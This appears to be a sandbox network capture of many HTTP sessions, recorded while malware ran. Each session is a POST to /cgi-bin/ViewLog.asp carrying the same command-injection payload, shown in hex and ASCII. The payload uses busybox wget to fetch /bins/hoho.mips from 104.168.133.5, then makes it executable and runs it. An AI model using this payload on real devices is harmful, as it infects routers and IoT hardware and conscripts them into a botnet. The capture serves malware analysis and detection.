                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:09.793214083 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              552192.168.2.144398294.232.127.2528080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:51.787193060 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:51.991787910 CET207INHTTP/1.1 404 Not Found
                                              Connection: keep-alive
                                              Date: Thu, 23 Nov 2023 04:17:51 GMT
                                              Content-Length: 10
                                              Server: Streamer 21.08
                                              Data Raw: 4e 6f 74 20 66 6f 75 6e 64 0a
                                              Data Ascii: Not found


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              553192.168.2.146008031.136.164.2518080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:52.577966928 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:55.713803053 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:01.857567072 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:13.889056921 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              554192.168.2.145040231.136.203.868080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:52.578025103 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:55.713804960 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:01.857566118 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:13.889046907 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              555192.168.2.143539494.110.145.2448080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:52.583106041 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              556192.168.2.144433694.121.184.1288080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:52.753357887 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              557192.168.2.144782494.131.60.2248080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:52.884763002 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:52.986273050 CET1314INHTTP/1.1 400 Bad Request
                                              Server: squid/6.0.0-20220501-re899e0c27
                                              Mime-Version: 1.0
                                              Date: Thu, 23 Nov 2023 04:17:52 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 3572
                                              X-Squid-Error: ERR_INVALID_URL 0
                                              Vary: Accept-Language
                                              Content-Language: en
                                              Cache-Status: ezproxies.com
                                              Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, s


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              558192.168.2.145673031.136.203.1958080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:52.969969988 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:53.537902117 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:54.689830065 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:56.993750095 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:01.601675034 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:10.817162037 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              559192.168.2.144314495.86.97.218080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:52.972419024 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              560192.168.2.143467294.224.142.478080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:52.988198042 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
